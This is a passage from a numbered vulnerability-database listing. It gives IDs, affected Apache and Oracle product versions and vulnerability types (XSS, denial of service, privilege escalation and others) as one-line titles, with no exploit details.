11117| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
11118| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
11119| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
11120| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
11121| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
11122| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
11123| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
11124| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
11125| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
11126| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
11127| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
11128| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
11129| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
11130| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
11131| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
11132| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
11133| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
11134| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
11135| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
11136| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
11137| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
11138| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
11139| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
11140| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
11141| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
11142| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
11143| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
11144| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
11145| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
11146| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
11147| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
11148| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
11149| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
11150| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
11151| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
11152| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
11153| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
11154| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
11155| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
11156| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
11157| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
11158| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
11159| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
11160| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
11161| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
11162| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
11163| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
11164| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
11165| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
11166| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
11167| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
11168| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
11169| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
11170| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
11171| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
11172| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
11173| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
11174| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
11175| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
11176| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
11177| [136370] Apache Fineract up to 1.2.x sql injection
11178| [136369] Apache Fineract up to 1.2.x sql injection
11179| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
11180| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
11181| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
11182| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
11183| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
11184| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
11185| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
11186| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
11187| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
11188| [134416] Apache Sanselan 0.97-incubator Loop denial of service
11189| [134415] Apache Sanselan 0.97-incubator Hang denial of service
11190| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
11191| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
11192| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
11193| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
11194| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
11195| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
11196| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
11197| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
11198| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
11199| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
11200| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
11201| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
11202| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
11203| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
11204| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
11205| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
11206| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
11207| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
11208| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
11209| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
11210| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
11211| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
11212| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
11213| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
11214| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
11215| [131859] Apache Hadoop up to 2.9.1 privilege escalation
11216| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
11217| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
11218| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
11219| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
11220| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
11221| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
11222| [130629] Apache Guacamole Cookie Flag weak encryption
11223| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
11224| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
11225| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
11226| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
11227| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
11228| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
11229| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
11230| [130123] Apache Airflow up to 1.8.2 information disclosure
11231| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
11232| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
11233| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
11234| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
11235| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
11236| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
11237| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
11238| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
11239| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
11240| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
11241| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
11242| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
11243| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
11244| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
11245| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
11246| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
11247| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
11248| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
11249| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
11250| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
11251| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
11252| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
11253| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
11254| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
11255| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
11256| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
11257| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
11258| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
11259| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
11260| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
11261| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
11262| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
11263| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
11264| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
11265| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
11266| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
11267| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
11268| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
11269| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
11270| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
11271| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
11272| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
11273| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
11274| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
11275| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
11276| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
11277| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
11278| [127007] Apache Spark Request Code Execution
11279| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
11280| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
11281| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
11282| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
11283| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
11284| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
11285| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
11286| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
11287| [126346] Apache Tomcat Path privilege escalation
11288| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
11289| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
11290| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
11291| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
11292| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
11293| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
11294| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
11295| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
11296| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
11297| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
11298| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
11299| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
11300| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
11301| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
11302| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
11303| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
11304| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
11305| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
11306| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
11307| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
11308| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
11309| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
11310| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
11311| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
11312| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
11313| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
11314| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
11315| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
11316| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
11317| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
11318| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
11319| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
11320| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
11321| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
11322| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
11323| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
11324| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
11325| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
11326| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
11327| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
11328| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
11329| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
11330| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
11331| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
11332| [123197] Apache Sentry up to 2.0.0 privilege escalation
11333| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
11334| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
11335| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
11336| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
11337| [122800] Apache Spark 1.3.0 REST API weak authentication
11338| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
11339| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
11340| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
11341| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
11342| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
11343| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
11344| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
11345| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
11346| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
11347| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
11348| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
11349| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
11350| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
11351| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
11352| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
11353| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
11354| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
11355| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
11356| [121354] Apache CouchDB HTTP API Code Execution
11357| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
11358| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
11359| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
11360| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
11361| [120168] Apache CXF weak authentication
11362| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
11363| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
11364| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
11365| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
11366| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
11367| [119306] Apache MXNet Network Interface privilege escalation
11368| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
11369| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
11370| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
11371| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
11372| [118143] Apache NiFi activemq-client Library Deserialization denial of service
11373| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
11374| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
11375| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
11376| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
11377| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
11378| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
11379| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
11380| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
11381| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
11382| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
11383| [117115] Apache Tika up to 1.17 tika-server command injection
11384| [116929] Apache Fineract getReportType Parameter privilege escalation
11385| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
11386| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
11387| [116926] Apache Fineract REST Parameter privilege escalation
11388| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
11389| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
11390| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
11391| [115883] Apache Hive up to 2.3.2 privilege escalation
11392| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
11393| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
11394| [115518] Apache Ignite 2.3 Deserialization privilege escalation
11395| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
11396| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
11397| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
11398| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
11399| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
11400| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
11401| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
11402| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
11403| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
11404| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
11405| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
11406| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
11407| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
11408| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
11409| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
11410| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
11411| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
11412| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
11413| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
11414| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
11415| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
11416| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
11417| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
11418| [113895] Apache Geode up to 1.3.x Code Execution
11419| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
11420| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
11421| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
11422| [113747] Apache Tomcat Servlets privilege escalation
11423| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
11424| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
11425| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
11426| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
11427| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
11428| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
11429| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
11430| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
11431| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
11432| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
11433| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
11434| [112885] Apache Allura up to 1.8.0 File information disclosure
11435| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
11436| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
11437| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
11438| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
11439| [112625] Apache POI up to 3.16 Loop denial of service
11440| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
11441| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
11442| [112339] Apache NiFi 1.5.0 Header privilege escalation
11443| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
11444| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
11445| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
11446| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
11447| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
11448| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
11449| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
11450| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
11451| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
11452| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
